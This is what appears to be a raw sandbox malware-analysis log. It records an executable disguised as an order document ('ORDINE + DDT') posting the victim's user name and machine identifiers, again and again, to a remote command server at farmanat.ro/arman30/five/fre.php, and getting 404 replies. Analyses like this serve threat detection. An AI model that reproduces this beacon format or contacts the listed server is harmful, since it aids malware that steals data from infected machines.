                                              Date: Thu, 25 Nov 2021 09:54:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              717192.168.11.2050565176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:11.949253082 CET7308OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:11.983292103 CET7308OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:12.037087917 CET7308INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              718192.168.11.2050566176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:12.442909956 CET7309OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:12.477206945 CET7309OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:12.526679039 CET7309INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              719192.168.11.2050567176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:12.904803038 CET7310OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:12.938934088 CET7310OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:12.995860100 CET7311INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              72192.168.11.2049908176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:46.527621031 CET6409OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:46.561898947 CET6409OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:46.613563061 CET6409INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              720192.168.11.2050568176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:13.432565928 CET7311OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:13.466087103 CET7312OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:13.516068935 CET7312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              721192.168.11.2050569176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:13.930896044 CET7313OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:13.964442015 CET7313OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:14.014487982 CET7313INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              722192.168.11.2050570176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:14.436252117 CET7314OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:14.470554113 CET7314OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:14.520673990 CET7315INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              723192.168.11.2050571176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:14.939599991 CET7315OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:14.973181963 CET7316OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:15.023457050 CET7316INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              724192.168.11.2050572176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:15.422755957 CET7317OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:15.456079006 CET7317OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:15.506026030 CET7317INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              725192.168.11.2050573176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:15.874761105 CET7318OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:15.908380985 CET7318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:15.959254026 CET7319INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              726192.168.11.2050574176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:16.294504881 CET7319OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:16.328176022 CET7320OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:16.395275116 CET7320INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              727192.168.11.2050575176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:16.790297031 CET7321OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:16.824731112 CET7321OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:16.884361982 CET7321INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              728192.168.11.2050576176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:17.290043116 CET7322OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:17.323609114 CET7322OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:17.375152111 CET7323INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              729192.168.11.2050577176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:17.798372984 CET7323OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:17.832739115 CET7324OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:17.890273094 CET7324INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              73192.168.11.2049909176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:47.107852936 CET6410OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:47.141951084 CET6410OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:47.196496010 CET6411INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              730192.168.11.2050578176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:18.280836105 CET7325OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:18.314085960 CET7325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:18.363445044 CET7325INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              731192.168.11.2050579176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:18.732676029 CET7326OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:18.765846968 CET7326OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:18.817780018 CET7327INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              732192.168.11.2050580176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:19.228581905 CET7327OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:19.262856007 CET7328OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:19.315669060 CET7328INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              733192.168.11.2050581176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:19.734999895 CET7329OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
